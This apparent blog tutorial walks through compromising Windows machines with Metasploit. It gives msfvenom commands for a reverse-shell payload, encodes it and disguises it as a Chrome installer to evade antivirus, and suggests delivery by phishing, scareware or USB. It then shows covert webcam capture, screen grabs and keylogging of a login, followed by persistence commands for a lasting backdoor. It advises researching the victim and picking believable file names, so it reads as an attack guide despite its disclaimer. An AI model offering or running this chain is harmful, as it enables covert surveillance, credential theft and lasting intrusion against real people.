Spy On Windows Machines Using Metasploit

Metasploit banner

Note you can now read this article on my new blog at https://blog.jamiepegg.com/metasploit-tutorial

Before We Start

Disclaimer (MUST READ)

The contents of this tutorial is for educational purposes only. I strongly suggest against, and I am not responsible for, any misuse of the information given. The tutorial has been made using my own hardware and does not contain any illegal activity.

Before we start, I would just like to cover a few basic pieces of information we will need, including keywords and names.

What is Metasploit?

First of all, Metasploit by Rapid7 helps security teams do more than just verify vulnerabilities, manage security assessments, and improve security awareness; it empowers and arms defenders to always stay one step (or two) ahead of the game.

The latest version 5.0.19 (at the time of writing), includes over 1800 exploits and over 640 payloads, which can be used to gain remote access to machines and servers.

What is a meterpreter?

A meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

Introduction

For this tutorial, I’ll be using my 2017 27inch 5K iMac, running Kali Linux 2019.2 on a VM, as the host and my old laptop, running Windows 8, as the target. You can use any machine with Metasploit installed as our host and for this target, we will specifically be attacking windows machines.

Plan of attack

Like I mentioned above, for this tutorial, we will be specifically targeting windows machines. To do this we will be using Metasploit’s reverse_tcp meterpreter payload.

I will be covering:

• Configuring Metasploit
• Generating Payloads
• Evading Anti-Virus, Encoding Payloads And Using Templates
• Delivering The Payload
• Opening A Meterpreter Session And Meterpreter Commands
• Installing Persistence And Opening A Backdoor

Configuring Metasploit

Feel free to skip this chapter if you have previously used Metasploit and have it all set up.

Download Metasploit

As I will be using Kali Linux Metasploit is already installed. However, if you are not on Kali Linux, you can install Metasploit from rapid7’s GitHub by clicking here.

Setting up Metasploit

Once you have downloaded Metasploit or if it’s your first time running the program we will need to configure your Metasploit database. To do so first open your command line/terminal and ensure your Metasploit is at the newest version by typing the following code:

apt update; apt install metasploit-framework

Or if you are running an older version of Linux use:

msfupdate

This will check for and download any necessary updates. Once our Metasploit is up-to-date we need to create the database itself, so simply enter the command:

msfdb init

You may be prompted to create a password, don’t worry if you are not, as long as the database is successfully initialised you’re good to go.

Output of ‘msfdb init’

Finally, to check if we have initialied our database correctly, start up the Metasploit console by typing the following into your command line/terminal:

msfconsole

Once we have launched the Metasploit console you can enter this command to check if our database is connected:

> db_status

If you were successful you should see something similar to this:

Successful output of ‘db_status’

Yours probably won’t look exactly the same but just make sure you can see somewhere it is ‘connected’.

Generating Payloads

We first need to make a payload to deliver to our victim in order to gain access to there machine.

Searching for payloads

To find the correct payload for our attack we can search through Metasploit's current 1897 exploits and 547 payloads using the search command. To view find more information on the parameters which the search command takes simply enter (In the Metasploit console):

> search

Output of ‘search’ in the Metasploit console

Here we can see some of the keywords we can use to filter through the payloads. In our case, we are exploiting a windows machine so we can use the ‘platform’ query.

> search platform: windows

As you can see the above command outputs thousands of payloads we can use, even if we narrow down out search using:

> search platform: windows type: payload port: tcp

we still get way too many outputs. So when you are choosing your payload just take your time to search for some good working payloads. Here are two favourite windows payloads you may want to use:

• windows/meterpreter/reverse_tcp
• windows/vncinject/reverse_tcp

For this tutorial, we are going to use the ‘windows/meterpreter/reverse_tcp’. However, feel free to use ‘windows/vncinject/reverse_tcp’, which is similar but creates a VNC session which can be useful for viewing your targets desktop.

Msfvenom // creating the payload

Once you have found your desired payload, we must turn it into an executable file which the victim can run on the target machine to start the meterpreter session. To do so we must use ‘msfvenom’ which is Metasploit’s command for generating executable payloads.

The command we can type to view more information on msfvenom is:

msfvenom

You should get something like this:

Output of ‘msfvenom’

Here we can see all of the different options you can use when using msfvenom. I’m not going to go through them all as most of them are self-explanatory. However, the parameters we are going to use are:

• Payload (name of chosen payload).
• Format (format of the output file, e.g. .exe or .pdf).
• Arch (architecture of target, e.g x32, x64 or x86).
• Other custom parameters like LHOST and LPORT.

Before you can create the payload, you need to know the host IP (LHOST or listen host) and port (LPORT or listen port) that you are going to use. If your target is on the same network as the host then you can simply find your local IPv4 address using the following command:

ifconfig

However, please note if you wish to attack someone who is on a different network to the host machine you will need to port forward. I will not be covering this in this tutorial as this is a whole other topic.

For the port you simply need to choose a port for the meterpreter to bind to. Today I am using port 4444

Once you have decided which parameters you will use/need you can create a payload. For example here is the command I used:

msfvenom --payload windows/meterpreter/reverse_tcp --arch x86 --format exe LHOST=192.168.0.28 LPORT=4444 > windowsMeterpreter.exe

A successfully generated payload

Once you have generated the payload the output file will be located in the current directory (directory which you were in when the command was executed), unless you specified a certain path.

Evading Anti-Virus, Encoding Payloads And Using Templates

Although we have successfully generated our payload, there is one problem with the file… It can easily be detected by anti-virus, this is a very big issue in a real-life scenario as the victim may hesitate to execute our payload or the file may even automatically be removed by anti-virus software.

Evading anti-virus

This whole chapter is about evading anti-virus by adjusting our payload. There are many ways to do this but I will be discussing the three main ways you can do so:

• Encoding payloads
• Templates (trojan)
• External tools
• Other techniques

Please note before you read on, the above methods will more than likely not work alone. It is best to use a combination of all the above techniques.

Encoding payloads

To encode our payload through metasploit we can simply add two extra parameters to our msfvenom command. The first one being ‘encoder’. We can view the available encoders to use for our target by using the following command:

msfvenom --list encoders

List of encoders currently available from Metasploit

As you can see there are many encoders available to use. The output (as seen above) shows us the name, rank and description of the encoder. The one we will be using, and one of the most popular encoders is x86/shikata_ga_nai, as you can see this encoder is rated excellent and should do a great job.

The second parameter we must add to our msfvenom command is ‘iterations’. This just simply means how many times the payload will be encoded.

Once you have chosen your encoder and number of iterations your msfvenom command should look something like the following:

msfvenom --payload windows/meterpreter/reverse_tcp --arch x86 --format exe --encoding x86/shikata_ga_nai --iterations 500 LHOST=192.168.0.28 LPORT=4444 > windowsMeterpreter.exe

If you execute the command, similar to last time the finished payload shall be outputted to the current directory.

Templates

In msfvenom we can use a template to disguise our payload as a regular program or even embed our payload in a regular program. Doing so will greatly increase the chance of our victim clicking on our payload. Which would you trust more ‘V1rU5.exe’ or ‘ChromeUpdate.exe’ ?

First, we need to download a normal program which we can use as a template. This is probably the easiest part of this tutorial! simply head over to Google Chrome’s website and download the installer for the targets platform. Obviously, you don’t just have to use the Chrome installer, you can use anything from images to music files.

Now you have got your template you just simply add the following to your msfvenom command:

--template /home/Downloads/ChromeUpdate.exe

Obviously, replace the path with the path to your template. So here is what our overall command looks like:

msfvenom --payload windows/meterpreter/reverse_tcp --template /home/Downloads/ChromeUpdate.exe  --arch x86 --format exe --encoding x86/shikata_ga_nai --iterations 500 LHOST=192.168.0.28 LPORT=4444 > windowsMeterpreter.exe

External tools

I’m not going to cover any specifics in depth as this tutorial is already becoming very long and all these tools have hundreds of settings to evade anti-virus.

External tools can be used once you have generated your payload to further encode them and hopefully sneak them past anti-virus. Some good examples of external encoding tools are:

• Hyperion
• Veil-Evasion
• peCloak

These are just a few of many tools you can use to encode your payloads. They all work similarly by taking in your msfvenom payload, encoding it, and outputting the new file.

Other techniques

Some other techniques that are worth pointing out are basic things:

• Don’t use stupid names → Please don’t use stupid names for your payload, because trust me, no one is ever going to run a file named ‘SuP3r5ecRetV1RuS.exe’. Use something sensible and believable such as ‘BiologyHomework.pptx’ or ‘PhotoshopHairBrush.abr’
• Use appropriate file extensions → I’ve seen this happen many times too, and this is honestly sometimes one of the biggest give-a-ways there is something wrong with your file. Use the correct file extensions! For example, if your payload is inside a word document, make sure the extension is .docx not .rar or something dodgy.
• Do a background check on your victim → Before you attack your victim do some background checks on them, this will greatly increase your chances of them opening the file. A common example is age, if your victim is a student, maybe try sending them some revision materials.
• Use specific ports → For this tutorial I’m using port 4444 which a bad example as is known to be used by Metasploit. It is best to use ports which are not filtered out by the firewall.

Delivering The Payload

The hardest part :(

Getting the payload on the victim’s machine

This is definitely the trickiest part of this tutorial, we now have to get our ‘secret, encrypted, in-disguise, payload file’ or whatever you want to call it, onto our victim’s machine. This however, would require a whole other tutorial as it’s such a big topic. Some methods you could try are as follows:

• Via email → A phishing attack asking the user to download a file is a very successful and common example of getting a payload onto a victim’s machine.
• Scareware → You could try using scareware to get a victim to download your file. For example, the classic: “A virus has been detected, update adobe flash player now !”.
• Physical access → You could simply just plug a USB with the payload into the victim’s machine and execute the file. The only problem is you need physical access.

Opening A Meterpreter Session And Meterpreter Commands

Let the games begin…

Configuring Metasploit

If you have successfully gotten your payload on your victim’s machine you’re probably wondering what to do next. Well first we must configure our metasploit to listen for out meterpreter in order to open a session. To do this start the metasploit console by using the command:

msfconsole

Once the Metasploit console has loaded up we must tell it to use the ‘multi/handler’ module so simply type:

> use multi/handler

If that was successful you should see the following:

Metasploit console using multi/handler

Once you have loaded the ‘multi/handler’ module, we must now tell Metasploit what payload we have used for our malicious file. To set the payload, use the command:

> set payload windows/meterpreter/reverse_tcp

Now we must set the LHOST and LPORT again for Metasploit to listen on. For this part make sure you ensure you use the same IP and Port we used in msfvenom when creating the payload.

To set the LHOST use the command:

> set LHOST 192.168.0.28

To set the LPORT use the following:

> set LPORT 4444

Obviously, change the above to use your IP and Port. Here is a screenshot of what my Metasploit console looked like, just so you can check you have done it right:

Overall Metasploit console after configuration

You can actually preview the changes we have set using the command:

> show options

This should output something like this, don’t worry if yours isn’t exactly the same, just ensure you have set the correct payload, IP and port:

Output of ‘show options’

Listening for the session

Now we have configured Metasploit we need to tell it to listen for the payload in order to open the session. This section is very short as we simply have to use the command:

> exploit

Please note, if you get the following error:

Bad port error

This means the port you have chosen is in use, so you will need to go back and change the port. Please don’t worry if you get an error saying handler failed to bind to: <address>:<port>. As long as after this it states:

Metasploit successfully listening

This means Metasploit is listening for the meterpreter session to start.

Opening the session

Once we have set Metasploit to listen for our meterpreter session if our victim opens our file, this is what a successful connection should look like:

A successful meterpreter session

Meterpreter commands

Now we have a successful meterpreter session on our victim, we are pretty much in control now. If you would like to view all of the available meterpreter commands you can simply type:

> help

All available meterpreter commands

As you can see there are a lot of commands so I shall let you browse them all and explore. However, I would like to quickly talk you through some of my favorite ones:

• webcam_snap / webcam_stream → This definitely makes it onto the list. By using:

> webcam_snap 

This takes a picture through the victim’s webcam, allowing you to spy on them.

Similar:

> webcam_stream

allows you to stream a victim’s webcam and watch what they’re doing live! Scary I know.

• screenshot → Screenshot well… allows to take a screenshot of the victim’s monitor screen, this is extremely useful if you need to quickly view what your victim is doing. Here is an example:

> screenshot

Meterpreter command ‘screenshot’

• keyscan_start / keyscan_dump → Keyscan is essentially a key logger, this is perfect if you are trying to capture the user’s credentials for a specific page/site. First, type:

> keyscan_start

to start the key logger, and then once you know the victim is finished simply type:

> keyscan_dump

to dump the keystrokes. Finally, stop the key logger using:

> keyscan_stop

Here is an example of me logging into facebook:

Meterpreter keyscan on Facebook

• Shell → Now shell is probably the most useful command of them all. Simply by entering:

> shell

into the meterpreter session, you can create a shell/command prompt session of you victim. This is extremely useful as allows you to create, edit or delete files, as well as copy/download files. Not only this but you can view all the running processes on the machine and even shutdown the computer.

Here is an example of a shell being created:

Shell being created

Installing Persistence And Opening A Backdoor

The final chapter!

Installing persistence/opening a backdoor

Now we have control of our victim’s machine we can do whatever we want. However, if the power is lost to the victim’s machine or their machine restarts our session will be closed! This is not good at all as in order to re-open our session they would have to open our file again. So to solve this we need to install persistence.

By default Metasploit have a script we can run in order to open a backdoor/install persistence. To view the options/parameters the script can take, enter this into our meterpreter session:

> run persistence -h

Here we see the following output:

Output of ‘run persistence -h’

As you can see most of the options are self-explanatory. The backdoor we are going to be creating however is going to try to connect every 10 seconds when the user logs on. To do this we need the following command:

> run persistence -U -i 10 -p 4444 -r 192.168.0.37

Obviously, change the port and the IP. The -U means when the user is logged in, the -i means interval which is set to every 10 seconds, the -p means port and the -r is the IP of the host.

We should get the following output:

Creating persistence

Rebooting the machine

Now we have successfully created a backdoor, we can test if it works by rebooting the victim’s machine. To do this, in our meterpreter simply enter:

> reboot

and this will reboot the victim’s machine. Then type:

> exit

Closing the meterpreter session

to close the session.

Reconnecting to the backdoor

For the next part, you need to ensure our m

Metasploit configurations are the same as previously, so in the Metasploit console enter:

> show options 

If your settings are not right then follow the instructions from previously to change them back. However, if they are correct, listen for the session again by using the command:

> exploit

in the Metasploit console. Now you just need to wait. When the user logs back into their account you should see a new session has been created. For example:

New meterpreter session.

Closing Statement

Well there you have it, you have successfully spied on a windows machine using Metasploit and created a persistent backdoor.

Disclosure (Again)

If you didn’t read it at the start, please read it now: The contents of this tutorial is for educational purposes only. I strongly suggest against, and I am not responsible for, any misuse of the information given. The tutorial has been made using my own hardware and does not contain any illegal activity.

Final words

This is my first ever medium post, I hope it’s not too long, oops ahah. I will be continuing these tutorials in the future so make sure you follow my account. Also I would greatly appreciate it if you gave this post a clap if it’s any good. The support is greatly appreciated!

Thanks so much for reading this, I hoped you have learned a lot, and I will see you all again soon! :)